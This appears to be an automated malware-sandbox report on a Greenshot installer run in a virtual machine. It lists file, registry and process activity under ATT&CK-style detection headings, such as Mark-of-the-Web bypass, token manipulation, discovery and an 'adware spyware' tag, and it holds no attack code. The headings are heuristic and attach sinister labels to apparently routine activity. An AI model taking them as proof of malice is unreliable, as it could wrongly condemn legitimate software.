File created C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ad0-0\System.Deployment.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11cc-0\System.Runtime.Serialization.Formatters.Soap.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index11.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\index19.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1060-0\System.Data.SqlXml.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index15.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\index10.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPD37A.tmp\System.Deployment.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b98-0\Greenshot.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1058-0\System.Numerics.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP948D.tmp\GreenshotPlugin.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\ngenlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPD697.tmp\LinqBridge.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\ed88e474eb5a0dec06f9de17e677f038\System.Security.ni.dll.aux.tmp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\c3e367eff9875c967c92b75a8688c55b\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\Clipup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\Clipup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\System32\clipup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\System32\clipup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\Clipup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\Clipup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\Clipup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\Clipup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\System32\clipup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\System32\clipup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\System32\clipup.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\System32\clipup.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Pattern Upgrade = "TRUE" C:\Windows\system32\rundll32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\System32\PickerHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1024x768x96(1).y = "4294935296" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3 = 78003100000000004759005f1100557365727300640009000400efbec5522d606d59e73a2e0000006c0500000000010000000000000000003a00000000002dcc690055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000010000000200000000000000ffffffff C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\System32\PickerHost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Greenshot\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Windows\System32\PickerHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Windows\System32\PickerHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 020000000000000001000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1024x768x96(1).x = "4294935296" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\System32\PickerHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Windows\System32\PickerHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} C:\Windows\System32\PickerHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "3" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" C:\Windows\System32\PickerHost.exe N/A
